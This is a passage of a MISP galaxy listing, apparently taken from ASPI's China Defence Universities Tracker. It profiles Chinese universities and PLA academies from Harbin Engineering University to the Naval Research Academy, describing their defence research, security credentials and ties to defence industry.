Harbin Engineering University (哈尔滨工程大学)

HEU is one of China’s top defence research universities. The university is a leading centre of research and training on shipbuilding, naval armaments, maritime technology and nuclear power. 36.46% of the university’s 2017 graduates who found employment were working in the defence sector.As one of the group of universities subordinate to the Ministry of Industry and Information Technology (MIIT) known as the ‘Seven Sons of National Defence’ (国防七子), HEU is an integral part of China’s defence industry. HEU’s achievements include producing China’s first experimental submarine, ship-based computer, and hovercraft. The university claims to have participated in most of the PLA Navy’s submarine, undersea weapon, and warship projects.HIT’s role in the defence industry is highlighted by its formal affiliation with the PLA Navy, which became a supervising agency of the university in 2007. Under the supervisory agreement, the PLA Navy committed to developing HEU’s capacity as a platform for research and development in military technology and for training defence personnel. The following year, HEU established a Defence Education Institute to train reserve officers. Since then, the institute has trained at least 1,700 officers. HEU also maintains a joint laboratory with the PLA Navy Coatings Analysis and Detection Center.HEU is an important hub research on nuclear engineering, including on nuclear submarines. In 2018, it signed a co-construction agreement with defence conglomerate China National Nuclear Corporation (CNNC). In 2019, HEU and CNNC established the China Nuclear Industry Safety and Simulation Technology Research Institute. HEU also runs a joint laboratory on energetic materials (such as explosives) with the Chinese Academy of Engineering Physics, China’s nuclear warhead research organisation.

The tag is: misp-galaxy:china-defence-universities="Harbin Engineering University (哈尔滨工程大学)"

Table 888. Table References

Links

https://unitracker.aspi.org.au/universities/harbin-engineering-university

Harbin Institute of Technology (哈尔滨工业大学)

HIT is one of China’s top defence research universities. As one of seven universities run by MIIT, it is known as one of the ‘Seven Sons of National Defence’ (国防七子). The Seven Sons of National Defence all have close relationships with the Chinese military and are core training and research facilities for China’s defence industry. In 2018, HIT spent RMB1.97 billion (AUD400 million)—more than half of its research budget—on defence research. 29.96% of the university’s graduates that year who found employment were working in the defence sector.HIT has been described by Chinese state media as having ‘defence technology innovation and weapons and armaments modernisation as its core’. It excels in satellite technology, robotics, advanced materials and manufacturing technology, and information technology. Other areas of defence research at HIT include nuclear technology, nuclear combustion, nuclear power engineering and electronic propulsion and thruster technology, many of which are officially designated as skill shortage areas for the Chinese defence industry.HIT is best known for its aerospace research and has a close relationship with China Aerospace Science and Technology Corporation (CASC), a state-owned defence company that specialises in long-range ballistic missile and satellite technology. Since 2008, HIT and CASC have operated a joint research centre. Defence conglomerates CASC, CASIC, AVIC and CETC rank among the top employers of HIT graduates. The university is a major source of cyber talent and receives funding for information security research from the MSS, China’s civilian intelligence agency. A report prepared for the US–China Security and Economic Review Commission identified it as one of four universities focused on research with applications in information warfare. In 2003, HIT founded its Information Countermeasures Technology Research Institute (哈尔滨工业大学信息对抗技术研究所).

The tag is: misp-galaxy:china-defence-universities="Harbin Institute of Technology (哈尔滨工业大学)"

Table 889. Table References

Links

https://unitracker.aspi.org.au/universities/harbin-institute-of-technology

Harbin University of Science and Technology (哈尔滨理工大学)

HRBUST focuses on engineering, science, economics, management, philosophy, literature, law and education. In 2015, it was placed under the joint supervision of the Heilongjiang Provincial Government and SASTIND, which is an arrangement designed to develop the university’s involvement in defence-related research and training.HRBUST’s relationship with SASTIND indicates that it will continue expanding its role in defence research. Currently, the university has at least four designated national defense disciplines and plans to build a national defense key laboratory. It holds secret-level security credentials.

The tag is: misp-galaxy:china-defence-universities="Harbin University of Science and Technology (哈尔滨理工大学)"

Table 890. Table References

Links

https://unitracker.aspi.org.au/universities/harbin-university-of-science-and-technology

Hebei University (河北大学)

Hebei University is Hebei Province’s only comprehensive university. The university subordinate to the Ministry of Education and also supervised by the Hebei Provincial Government and defence industry agency SASTIND. Its supervision by SASTIND, which began in 2013, is designed to support the university in ‘strengthening its national defence characteristics’.HBU appears to be relatively secretive about its defence research. In 2017, SASTIND designated an area of research at the university’s College of Physics Science and Technology as a ‘discipline with defence characteristics’. An article about this on the university’s news site has been taken down and deliberately did not specify the discipline. However, a speech given by the head of the college named military-use power and energy as HBU’s only defence discipline. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects.In 2017, HBU held a forum on military-civil fusion for technology and innovation to ‘uncover the university’s potential for defence-industry technological research’ and encourage greater integration with defence companies.

The tag is: misp-galaxy:china-defence-universities="Hebei University (河北大学)"

Table 891. Table References

Links

https://unitracker.aspi.org.au/universities/hebei-university

Hebei University of Science and Technology (河北科技大学)

HEBUST engages in moderate but growing levels of defence research. It has been supervised by defence industry agency SASTIND since 2013, when SASTIND and the Hebei Provincial Government agreed to jointly develop the university’s involvement in defence research. By 2017, the university claimed to have completed 300 defence projects. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects.While the university does not appear to have any dedicated defence laboratories, it has described five of its laboratories as platforms for defence research. Areas of materials science, mechanical engineering and control science at HEBUST have been designated ‘disciplines with national defence charcteristics’ by SASTIND. HEBUST may also be pursuing greater integration between China’s defence needs and the university’s research on textiles engineering and biological fermentation.HEBUST states that is has developed close cooperation with China Electronics Technology Group Corporation’s 54th Research Institute, an organization blacklisted by the US Government Entity List. Defence industry conglomerate Aviation Industry Corporation of China also funds research at the university.

The tag is: misp-galaxy:china-defence-universities="Hebei University of Science and Technology (河北科技大学)"

Table 892. Table References

Links

https://unitracker.aspi.org.au/universities/hebei-university-of-science-and-technology

Hefei University of Technology (合肥工业大学)

HFUT a leading Chinese university subordinate to the Ministry of Education. It specialises in engineering and engages in growing levels of defence research, particularly in the fields of advanced materials, smart manufacturing and electronic information. As of 2018, HFUT was the only civilian university in Anhui Province fully certified to carry out military projects, holding secret-level security credentials, and had undertaken over 200 such projects.In 2018, the university came under a ‘joint-construction’ agreement between the Ministry of Education and defence industry agency SASTIND. According to HFUT, this agreement ‘will powerfully advance the university’s development of national defence disciplines, training of talent for defence industry, and construction of defence industry and national defence research platforms.’Miao Wei, head of the Ministry of Industry and Information Technology, which oversees China’s defence industry, is a graduate of HFUT.

The tag is: misp-galaxy:china-defence-universities="Hefei University of Technology (合肥工业大学)"

Table 893. Table References

Links

https://unitracker.aspi.org.au/universities/hefei-university-of-technology

Heilongjiang Institute of Technology (黑龙江工程学院)

HLJIT is an engineering-focused university that engages in growing levels of defence research. In 2015, the Heilongjiang Provincial Government partnered with defence industry agency SASTIND to expand the university’s ability to ‘show its national defence characteristics and serve the national defence science and technology industry.’SASTIND has designated military-use power and energy, optoelectronics and laser technology, and computing as three ‘disciplines with national defence characteristics’ at HLJIT. In June 2016, HLJIT and ZTE jointly launched an MOE-ZTE ICT Product-Teaching Integration Innovation Base (教育部-中兴通讯ICT产教融合创新基地) and established the Heilongjiang School of Engineering-ZTE Information and Communications Technology College (黑龙江工程学院-中兴信息通信技术学院). ZTE has been reportedly barred from US government contracts.As it increases its implementation of military-civil fusion, HLJIT has developed relationships with defence conglomerates. The university is particularly close to China Aerospace Science and Technology Corporation (CASC), a leading state-owned manufacturer of long-range missiles and satellites. In 2017, HLJIT partnered with a subsidiary of CASC to establish a joint research centre, the Aerospace Smart City Research Institute. The subsidiary, Aerospace Shenzhou Smart System Technology Co., Ltd. (航天神舟智慧系统技术有限公司), specialises in smart city and informatization technology.HLJIT holds confidential-level security credentials, allowing it to participate in confidential defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Heilongjiang Institute of Technology (黑龙江工程学院)"

Table 894. Table References

Links

https://unitracker.aspi.org.au/universities/heilongjiang-institute-of-technology

Heilongjiang University (黑龙江大学)

HLJU is supervised by the Ministry of Education, the Heilongjiang Provincial Government and SASTIND. SASTIND’s supervision of the university is designed to promote its integration with China’s defence technology goals. In 2016, the year after HLJU came under SASTIND’s supervision, the university received third-class security credentials and funding for a national defence technology research project for the first time. Third-class security credentials allow the university to participate in confidential defence research projects. By 2018, HLJU claimed to have received RMB13 million (AUD2.7 million) in defence research funding.HLJU has close ties with Russian universities and is best known for its work in the Chemistry, Chemical Engineering and Materials Department, which entered the top 1 percent of ESI’s global rankings.

The tag is: misp-galaxy:china-defence-universities="Heilongjiang University (黑龙江大学)"

Table 895. Table References

Links

https://unitracker.aspi.org.au/universities/heilongjiang-university

Henan University of Science and Technology (河南科技大学)

HAUST is Henan province’s leading civilian university for defence research. In 2008, it became the first university in the province to receive security credentials allowing it to participate in classified weapons projects. In 2016, it became the province’s only university subject to a ‘joint-construction’ agreement with defence industry agency SASTIND, an arrangement designed to increase HAUST’s involvement in defence research. As early as 2009, the university stated that it had made great contributions to the defence and aviation industries, undertaking large amounts of defence research projects.HAUST describes itself as China’s primary university for research and training for the mechanical bearings (such as ball bearings) industry. SASTIND has designated three areas of research at the university as ‘disciplines with defence characteristics’, covering systems engineering, materials science and mechanics. The university is actively involved in military-civil fusion activities.The university claims to have made important contributions to the development of bearings for aircraft engines, satellites, and spacecraft. It states that it has resolved critical technological problems for specific weapons guidance systems, ballistic missile testing systems and an infrared targeting and interference emulation system that are probably used to test guided missiles.

The tag is: misp-galaxy:china-defence-universities="Henan University of Science and Technology (河南科技大学)"

Table 896. Table References

Links

https://unitracker.aspi.org.au/universities/henan-university-of-science-and-technology

Huazhong University of Science and Technology (华中科技大学)

HUST is one of China’s leading research institutions. While the university is subordinate to the Ministry of Education, it has also been supervised by the State Administration of Science, Technology and Industry for National Defense since 2012.The university hosts at least six laboratories dedicated to defence research. Its National Defence Research Institute reportedly oversees defence research in seven other HUST research centres. Artificial intelligence, shipbuilding, image processing, navigation technology, mechanical engineering, electronics, materials science and laser physics are focuses of HUST’s defence research.HUST has worked closely with the PLA and China’s defence industry. This collaboration includes the development artificial intelligence and imaging technology for weapons. The university’s work on pulsed power is linked to China’s nuclear and directed-energy weapons program. China’s state-owned defence conglomerates and China’s nuclear warhead facility sponsor dozens of HUST postgraduate students each year, who are required to work at their sponsoring organisation for at least five years after graduating.HUST holds secret-level security credentials, allowing it participate in research and production for classified weapons and defence projects.

The tag is: misp-galaxy:china-defence-universities="Huazhong University of Science and Technology (华中科技大学)"

Table 897. Table References

Links

https://unitracker.aspi.org.au/universities/huazhong-university-of-science-and-technology

Hunan University (湖南大学)

HNU is a leading Chinese university subordinate to the Ministry of Education. In recent years, its participation in defence research appears to have grown substantially. In 2010, it established the National Supercomputer Center in Changsha jointly with the PLA National University of  Defense Technology, which has since been placed on the US Government Entity List for its suspected role in nuclear weapons research.In 2011, China’s defence industry agency, SASTIND, entered a partnership with the MOE to expand the university’s participation in defence research and defence industry ties. This arrangement was renewed in 2016. In 2013, SASTIND and the Hunan Provincial Government also signed an agreement to jointly support the development of the university’s National Supercomputer Center.HNU holds secret-level security credentials, enabling it to participate in research and production for weapons and other defence projects.

The tag is: misp-galaxy:china-defence-universities="Hunan University (湖南大学)"

Table 898. Table References

Links

https://unitracker.aspi.org.au/universities/hunan-university

Hunan University of Science and Technology (湖南科技大学)

HNUST is an engineering-focused university founded in 2003. In 2016, it was subject to a ‘joint-construction’ agreement between the Hunan Provincial Government and defence industry agency SASTIND, an arrangement designed to develop the university’s involvement in defense-related research and training. The university has three designated defence research areas, is involved in weapons research, and has confidential-level security credentials.HNUST is home to two national defence key laboratories, one of which is in the School of Materials Science and Engineering. The university has also established its Intelligent Manufacturing Institute, which evolved from a provincial key laboratory and has connections to the Made in China 2025 strategy.HNUST is also linked to state-owned arms manufacturer Norinco Group. In 2018, it signed a strategic cooperation agreement with arms manufacturer Norinco’s National Defence Key Laboratory on Light Weapons Terminal Lethality Technology (轻武器终点杀伤技术国防科技重点实验 aka 瞬态冲击技术国防科技重点实验室).

The tag is: misp-galaxy:china-defence-universities="Hunan University of Science and Technology (湖南科技大学)"

Table 899. Table References

Links

https://unitracker.aspi.org.au/universities/hunan-university-of-science-and-technology

Information Engineering University (中国人民解放军信息工程大学)

IEU was formed in June 2017, combining the old Information Engineering University with the PLA Foreign Languages University. PLA experts have described IEU as ‘the sole military academy for the cyber and electronic warfare arms of China’s network-electronic forces’.The IEU is currently subordinate to the PLA Strategic Support Force’s Network Systems Department, which holds the military’s signals intelligence capabilities. Previously, the university was run by the General Staff Department Third Department (commonly known as 3PLA), the PLA’s signals intelligence service that has been incorporated into the Strategic Support Force. IEU’s command tracks include Network Engineering (网络工程), which is dedicated to the cultivation of cyber attack and defense technical cadre (网络攻防技术干部). It is responsible for the construction of the Henan Provincial Laboratory of Visible Light Communication (河南省可见光通信重点实验室).The university is primarily known for research and training on hacking, cryptography, signals processing, surveying and mapping, and navigation technology. However, since absorbing the PLA Foreign Languages University, it now serves as one of the most important language schools for Chinese military intelligence officers, describing itself as a ‘whole-military foreign languages training base for individuals going abroad’. While the PLA Foreign Languages University is best known for training signals intelligence officers, it has also trained many officers in the PLA’s political warfare wing, the Central Military Commission Political Work Department Liaison Bureau.

The tag is: misp-galaxy:china-defence-universities="Information Engineering University (中国人民解放军信息工程大学)"

Table 900. Table References

Links

https://unitracker.aspi.org.au/universities/information-engineering-university-2

Institute of NBC Defense (陆军防化学院)

The Institute of NBC Defense is the PLA’s premier institution devoted to training junior, mid-career and senior officers on technology related to defence against nuclear, biological and chemical weapons. Most scientific research tends to focus on radiation protection and nuclear safety.

The tag is: misp-galaxy:china-defence-universities="Institute of NBC Defense (陆军防化学院)"

Table 901. Table References

Links

https://unitracker.aspi.org.au/universities/institute-of-nbc-defense

Jiangnan Social University (江南社会学院)

JSU trains intelligence officers in tradecraft and carries out research on intelligence and security. The university first opened in 1986 with over 600 students and staff. Since 1999, it has run the Journal of Jiangnan Social University, which publishes research on international security, strategy and politics. Satellite and streetview imagery from Google Maps and Baidu appears to show a shooting range at the southern end of its campus.

The tag is: misp-galaxy:china-defence-universities="Jiangnan Social University (江南社会学院)"

Table 902. Table References

Links

https://unitracker.aspi.org.au/universities/jiangnan-social-university

Jiangsu University of Science and Technology (江苏科技大学)

JUST engages in high levels of defence research. With a focus on research relevant to the PLA Navy, JUST is supervised by the China State Shipbuilding Corporation and the China Shipbuilding Industry Corporation, China’s leading defence shipbuilding conglomerates. In 2002, JUST was one of eight universities jointly supervised by defence industry agency COSTIND and a provincial government. In 2016, its was the subject of an agreement between the Jiangsu Provincial Government and defence industry agency SASTIND to expand its role in defence research.JUST scientists have been involved in nuclear submarine, unmanned submersible and aircraft carrier projects. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects.Faculties at the university involved in defence research include the School of Naval Architecture and Ocean Engineering and the School of Energy and Propulsion.

The tag is: misp-galaxy:china-defence-universities="Jiangsu University of Science and Technology (江苏科技大学)"

Table 903. Table References

Links

https://unitracker.aspi.org.au/universities/jiangsu

Jilin University (吉林大学)

JLU is directly under the administration of the Ministry of Education and came under the joint supervision of the ministry and defence industry agency SASTIND in 2016. In 2017, SASTIND designated eight fields of research at JLU as national defence disciplines, indicating the university carries out high levels of defence research.  In 2012, JLU spent roughly RMB60 million (AUD12.5 million) on defence research, a number that is likely to have grown substantially.JLU’s National Defense Science and Technology Research Institute, also known as the Advanced Technology Research Institute, was established in April 2006 and is responsible for the organization and management of the university’s national defence science and technology projects. The research institute has received several certifications to conduct research for military applications. It conducts research in collaboration with the former PLA General Armaments Department, SASTIND, and state-owned defence conglomerates in the fields of aviation, aerospace, electronics, nuclear technology, and shipbuilding.JLU’s State Key Laboratory of Superhard Materials (超硬材料国家重点实验室) works closely with China’s nuclear weapons complex, the Chinese Academy of Engineering Physics (CAEP). Job advertisements for a CAEP subsidiary, the Center for High Pressure Science & Technology Advanced Research (北京高压科学研究中心) state that it has a branch within Jilin University. This suggests that CAEP may even be involved in managing the State Key Laboratory of Superhard Materials.The university hosts at least two defence research labs, located in the university’s College of Computer Science and Technology and in the College of Chemistry. Its Key Laboratory of Attack and Defense Simulation Technology for Naval Warfare, Ministry of Education (海战场攻防对抗仿真技术教育部重点实验室(B类)) is involved in cybersecurity research for the Navy. The lab’s academic committee is headed by a computer scientist from China Aerospace Science and Technology Corporation, a leading state-owned missile manufacturer.JLU holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Jilin University (吉林大学)"

Table 904. Table References

Links

https://unitracker.aspi.org.au/universities/jilin-university

Kunming University of Science and Technology (昆明理工大学)

Kunming University of Science and Technology appears to engage in low levels of defence research, but its involvement in defence research is likely to grow. In 2017, Kunming University of Science and Technology signed an agreement with Yunnan’s defence technology bureau to deepen military-civil fusion. In 2018, the Yunnan Provincial Government and defence industry agency SASTIND signed an agreement to jointly construct KMUST. The agreement is designed to increase the university’s involvement in defence research.KMUST carries out high levels of research on metallurgy. It is involved in defence research related to China’s aviation industry, and collaborates with defence shipbuilding conglomerate CSIC on vibration and noise research.

The tag is: misp-galaxy:china-defence-universities="Kunming University of Science and Technology (昆明理工大学)"

Table 905. Table References

Links

https://unitracker.aspi.org.au/universities/kunming-university-of-science-and-technology

Lanzhou University (兰州大学)

LZU’s involvement in defence research has slowly grown over the past decade. In 2018, it spent over RMB50 million (AUD10 million) on defence projects.LZU is subordinate to the Ministry of Education. Since 2018, it has also been supervised by defence industry agency SASTIND in an arrangement designed to further expand the university’s defence research and the defence industry relationships.LZU carries out national defence-related research in areas such as nuclear science, electromagnetism, probes, chemistry, mechanics, materials science, stealth technology and information technology.In 2017 and 2018, LZU signed strategic agreements with state-owned defence companies Norinco Group, China’s largest arms manufacturer, and China National Nuclear Corporation. Several defence companies, as well as China’s nuclear weapons program, provide scholarships for dozens of LZU postgraduate students each year. In return, these students must work for their sponsoring organisation for five years after graduation.In 2005, LZU received secret-level security credentials that allow it to participate in classified weapons projects.

The tag is: misp-galaxy:china-defence-universities="Lanzhou University (兰州大学)"

Table 906. Table References

Links

https://unitracker.aspi.org.au/universities/lanzhou-university

Lanzhou University of Technology (兰州理工大学)

Lanzhou University of Technology (兰州理工大学)

The tag is: misp-galaxy:china-defence-universities="Lanzhou University of Technology (兰州理工大学)"

Table 907. Table References

Links

https://unitracker.aspi.org.au/universities/lanzhou-university-of-technology

Logistics University of the People’s Armed Police Force (中国人民武装警察部队后勤学院)

The Logistics University of the People’s Armed Police Force is an institution devoted to training personnel in logistics for China’s paramilitary service, the People’s Armed Police. The university teaches subjects in applied economics, military logistics studies, paramilitary logistics, applied psychology, as well as communications and transportation engineering.The Logistics University of the People’s Armed Police Force actively collaborates with private institutions and civilian universities on scientific research. For example, the university collaborated with Nankai University (南开大学) and the Tianjin Eminent Electric Cell Material Company (天津爱敏特电池材料有限公司) on high performance lithium and sodium ion materials in 2018. The university also collaborated with the Tianjin Polytechnic University (天津工业大学) on intelligence, wearable technology that monitors heart rates for both military and civilian personnel.

The tag is: misp-galaxy:china-defence-universities="Logistics University of the People’s Armed Police Force (中国人民武装警察部队后勤学院)"

Table 908. Table References

Links

https://unitracker.aspi.org.au/universities/logistics-university-of-the-peoples-armed-police-force

Nanchang Hangkong University (南昌航空大学)

NCHU engages in high levels of defence research relevant to the aviation industry. In 2017, the Ministry of Education designated it a ‘school with national defence education characteristics’, and 30% of graduates go to work in the defence industry or civilian aviation companies. The university has been supervised by defence industry agency SASTIND since 2010. It holds secret-level security credentials.Five fields of research at NCHU are designated ‘national defence key disciplines’: precision forming and joining technology, component quality testing and control, testing and measurement technology and instruments, optoelectric and laser technology, and military-use critical materials. The university hosts at least three laboratories focused on defence research.NCHU is particularly close to AVIC, the Chinese military’s aircraft manufacturing company. In particular, AVIC subsidiary Hongdu Aviation Industry Group (洪都航空工业集团) is based in Nanchang and has frequent exchanges with NCHU.

The tag is: misp-galaxy:china-defence-universities="Nanchang Hangkong University (南昌航空大学)"

Table 909. Table References

Links

https://unitracker.aspi.org.au/universities/nanchang-hangkong-university

Nanchang University (南昌大学)

NCU engages in low levels of defence research. It holds secret-level security credentials, allowing it to carry out classified defence research. In 2006, it established a defence research institute together with five provincial defence industry companies. Based on affiliated staff members, the institute may be focused on mechanical engineering.The university was added to the US Government Unverified List in 2018. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Nanchang University (南昌大学)"

Table 910. Table References

Links

https://unitracker.aspi.org.au/universities/nanchang-university

Nanjing Army Command College (南京陆军指挥学院)

The Nanjing Army Command College is an institute devoted to training mid-career staff officers in preparation for command the PLA Ground Force. Disciplines of focus for the college include joint campaign tactics, warfighting command, military training and combat simulations.

The tag is: misp-galaxy:china-defence-universities="Nanjing Army Command College (南京陆军指挥学院)"

Table 911. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-army-command-college

Nanjing Institute of Information Technology (南京信息技术研究院)

Nanjing Institute of Information Technology (南京信息技术研究院)

The tag is: misp-galaxy:china-defence-universities="Nanjing Institute of Information Technology (南京信息技术研究院)"

Table 912. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-institute-of-information-technology

Nanjing Normal University (南京师范大学)

Nanjing Normal University is a leading Chinese university supervised by the Ministry of Education and Jiangsu Provincial Government. The university has strengths in geospatial technology, big data and artificial intelligence.Nanjing Normal University has close ties to the Ministry of Public Security. In 2014, the university established the Ministry of Public Security Key Laboratory for Police Geospatial Information Technology (警用地理信息技术公安部重点实验室), which researches applications of geospatial information technology for policing purposes. Nanjing Normal University has also entered into an agreement with the Nanjing Municipal Public Security Bureau, establishing the ‘Video GIS Technology Laboratory’ (视频GIS技术实验室) in April 2012.Nanjing Normal University has a close relationship with the regional government in Xinjiang, where over 1 million Uyghurs and Kazakhs are currently held in internment camps. In 2015, the university entered into an agreement with the Xinjiang Uyghur Autonomous Government and the Jiangsu Municipal Government to support the development of Yili Normal University.

The tag is: misp-galaxy:china-defence-universities="Nanjing Normal University (南京师范大学)"

Table 913. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-normal-university

Nanjing Tech University (南京工业大学)

In 2016, NJTech came under the joint supervision of the Jiangsu Provincial Government and defence industry agency SASTIND, which is an arrangement designed to develop the university’s involvement in defense-related research and training. The university has four designated defence research areas and secret-level security credentials, allowing it to undertake classified defence technology projects.NJTech is expanding its defence research on materials science, chemistry, optical engineering and systems engineering. In 2018, the university established a Military-Civil Fusion Development Research Institute to deepen its implementation of military-civil fusion. NJTech has a Defence Industry Science Office (军工科研办公室) within its Depart of Scientific of Research. This office is responsible for the university’s defence-related research and coordination. NJTTech’s School of Materials Science and Engineering (材料科学与工程学院) has previously worked on defence-related projects.The university has international ties with universities in England that focus on electronics and semiconductors. It has also established a joint research center with Russian universities for advanced technology R&D.

The tag is: misp-galaxy:china-defence-universities="Nanjing Tech University (南京工业大学)"

Table 914. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-tech-university

Nanjing University (南京大学)

NJU is subordinate to the MOE and has also been supervised by defence industry agency SASTIND since 2012. In 2016, the university was selected as a participant in the first batch of national dual-use demonstration bases, and a year later in 2017 was selected as a Class A world-class university. NJU is home to at least two defence laboratories and has committed to deepening its involvement in military-civilian fusion. As the first university in China to establish a State Secrecy Academy, in 2009, Nanjing University is involved in cyber security research.In 2018, NJU established an Institute of Artificial Intelligence and reported its research progress to the Jiangsu Provincial Committee of Military-Civilian Fusion when they visited the university. Following the visit, the provincial committee expressed interest in deepening cooperation on MCF projects in order to promote Jiangsu’s MCF work. The Institute of AI also co-built a research center with Intel, the Intel-Nanjing University Artificial Intelligence Research Center, which is Intel’s first research center focusing on AI in China. The university’s rapidly developing AI Institute provides an opportunity for deepening its involvement in MCF R&D. In May 2018, NJU signed a strategic cooperation agreement with Megvii 旷视科技. Megvii has been blacklisted by the US government over human rights abuses.

The tag is: misp-galaxy:china-defence-universities="Nanjing University (南京大学)"

Table 915. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-university

Nanjing University of Aeronautics and Astronautics (南京航空航天大学)

NUAA is one of the ‘Seven Sons of National Defence’ subordinate to the Ministry of Industry and Information Technology. NUAA specialises in aerospace research and works closely with the Chinese military as well as civilian and military aviation companies, including military aircraft manufacturers AVIC and AECC. 21% of the university’s graduates in 2018 who found employment were working in the defence sector.The university claims to have participated in nearly all major national aviation projects, including the development of the Chang’e 3 unmanned lunar explorer. NUAA hosts China’s only national defence laboratory for helicopter technology.NUAA has attracted controversy for its alleged involvement in the Ministry of State Security’s efforts to steal US aviation technology.

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Aeronautics and Astronautics (南京航空航天大学)"

Table 916. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-university-of-aeronautics-and-astronautics

Nanjing University of Posts and Telecommunications (南京邮电大学)

NJUPT was initially ‘one of the earliest institutions devoted to training communications personnel for the Chinese Communist Party and red army’. Since then, NJUPT has evolved from a training college to a civilian university that offers undergraduate, post-graduate and doctoral degrees in various communications and engineering disciplines.NJUPT holds secret-level security credentials, allowing it to participate in classified defence research projects.Key areas of research include at the university:

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Posts and Telecommunications (南京邮电大学)"

Table 917. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-university-of-posts-and-telecommunications

Nanjing University of Science and Technology (南京理工大学)

NJUST is one of the ‘Seven Sons of National Defence’ administered by the Ministry of Industry and Information Technology. Together with Beijing Institute of Technology, it was ranked as China’s top university for armaments science in 2017. Roughly 16% of the university’s graduates in 2018 who found employment were working in the defence sector.NJUST is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions specialising in weapons science—the ‘B’ in ‘B8’ stands for Chinese word for armaments, bingqi (兵器). Indicative of the university’s high level of involvement in defence research, in 2013 a disused laboratory on its campus exploded, killing one, after workers disturbed a cache of explosives.NJUST has a collaborative relationship with a PLA signals intelligence research institute, involving cooperation on unmanned combat platforms and information security.

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Science and Technology (南京理工大学)"

Table 918. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-university-of-science-and-technology

National Defense University (中国人民解放军国防大学)

NDU is the PLA’s ‘premier’ institution for training in military theory, strategy, operations and political work, which can have its history traced back to the era of Mao Zedong’s peasant-led red army in 1927.The university is devoted to training the PLA’s officer corps in preparation for senior leadership positions. Given this focus on the softer skills of PLA administration, the National Defense University does not have as strong a focus on hard science as its counterpart, the National University of Defense Technology.

The tag is: misp-galaxy:china-defence-universities="National Defense University (中国人民解放军国防大学)"

Table 919. Table References

Links

https://unitracker.aspi.org.au/universities/national-defense-university

National University of Defense Technology (中国人民解放军国防科技大学)

In 2017, NUDT was reformed and placed in charge of the Institute of International Relations in Nanjing, the National Defense Information Institute in Wuhan, the Xi’an Communications College, the Electrical Engineering Institute in Hefei, and the College of Meteorology and Oceanography in Nanjing. The Institute of International Relations in Nanjing is a key training centre for intelligence officers.NUDT is known for its research on supercomputers, autonomous vehicles, hypersonic missiles and China’s Beidou Navigation Satellite System. The university developed the Tianhe-2A supercomputer at the National Supercomputing Center in Guangzhou, the world’s fastest supercomputer from 2013 to 2016. NUDT’s Tianhe-1A supercomputer is based at Hunan University’s National Supercomputing Center Changsha (国家超级计算长沙中心).For over a decade, NUDT has aggressively leveraged overseas expertise and resources to build its capabilities. The Australian Strategic Policy Institute’s International Cyber Policy Centre’s October 2018 report ‘Picking flowers, making honey: The Chinese military’s collaboration with foreign universities’ documented and analysed NUDT’s overseas presence. The report found that by 2013 the university had sent over 1,600 of its professors and students to study and work abroad. Universities in the United States, the United Kingdom, Australia, Canada, Singapore, the Netherlands and Germany engage in some of the highest levels of collaboration with NUDT. Some of NUDT’s leading experts on drone swarms, hypersonic missiles, supercomputers, radars, navigation and quantum physics have been sent to study or work abroad.Defected Chinese spy Wang Liqiang claimed in 2019 that NUDT’s ‘Intelligence Center’ sent him fake passports for his mission to interfere in Taiwanese politics. This indicates that the university plays an important role in supporting China’s overseas intelligence activity.NUDT also works with foreign technology companies. Google and Microsoft have both worked with and trained NUDT scientists.

The tag is: misp-galaxy:china-defence-universities="National University of Defense Technology (中国人民解放军国防科技大学)"

Table 920. Table References

Links

https://unitracker.aspi.org.au/universities/national-university-of-defense-technology

Naval Command College (中国人民解放军海军指挥学院)

The Naval Command College is an institution that provides education and training for naval officers in a variety of disciplines such as military thought, strategic studies, intelligence training and political work along with military operations, tactics and campaigns. The college plays a crucial role in improving the quality of PLA Navy personnel, as well as providing combined arms training for mid-career political commissars, logistics officers and equipment officers. The college serves to improve strategic and tactical thinking in the PLA Navy by hosting the Naval Campaigns and Tactics Center Laboratory (海军战役战术中心实验室) and producing research that looks at operationalising new training and command systems. It is the PLA-N’s last remaining command academic institution.

The tag is: misp-galaxy:china-defence-universities="Naval Command College (中国人民解放军海军指挥学院)"

Table 921. Table References

Links

https://unitracker.aspi.org.au/universities/naval-command-college

Naval Petty Officer Academy (中国人民解放军海军士官学校)

The academy has three main departments focused on training, campus affairs and political work. It has published research on radar jamming.

The tag is: misp-galaxy:china-defence-universities="Naval Petty Officer Academy (中国人民解放军海军士官学校)"

Table 922. Table References

Links

https://unitracker.aspi.org.au/universities/naval-petty-officer-academy

Naval Research Academy (中国人民解放军海军研究院)

The Naval Research Academy was established in July 2017 following Xi Jinping’s military reforms. Main areas of study include military theory and technological research as well as the maritime environment and national defence engineering.The Naval Research Academy actively collaborates with civilian universities as part of China’s military-civil fusion program. In April 2019, delegates from the Naval Research Academy attended a meeting with officials from Xi’an Jiaotong University on co-operation directed at improving the quality assurance and technological reliability of complex armaments currently in service in the PLA Navy. Major General Li Wei from the Naval Research Academy stated that his colleagues were paying ‘very close attention to this co-operation with Xi’an Jiaotong University’ in the development and sustainment of naval equipment.The Naval Research Academy also collaborates with civilian research institutes. For example, the Institute for Industrial Military-Civil Fusion at the Research Institute of Machinery Industry Economic and Management claims to have worked with the Naval Research Academy and a number of state-owned enterprises that focus on defence technology such as China Shipbuilding Industry Corporation (CSIC) in order to develop strategies for military-civil fusion.The Naval Research Academy’s involvement in military-civil fusion is particularly notable for work on maritime information technology and equipment. In January 2019, delegates from the Naval Research Academy attended a conference hosted by the National Key Laboratory of Underwater Acoustic Science and Technology (水声技术国防科技重点实验室) and the Key Laboratory of Marine Information Acquisition and Security Industry and Information Technology 